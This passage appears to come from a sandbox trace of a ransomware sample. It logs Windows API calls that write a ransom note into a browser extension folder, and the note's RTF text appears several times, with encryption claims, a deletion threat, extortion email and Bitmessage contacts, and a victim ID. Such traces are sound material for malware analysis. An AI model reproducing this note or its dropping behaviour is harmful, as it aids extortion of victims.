ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.198] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.199] CloseHandle (hObject=0x2ec) returned 1 [0291.199] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\#readme_eman#.rtf")) returned 0xffffffff [0291.199] GetLastError () returned 0x2 [0291.199] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.200] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.200] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.200] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 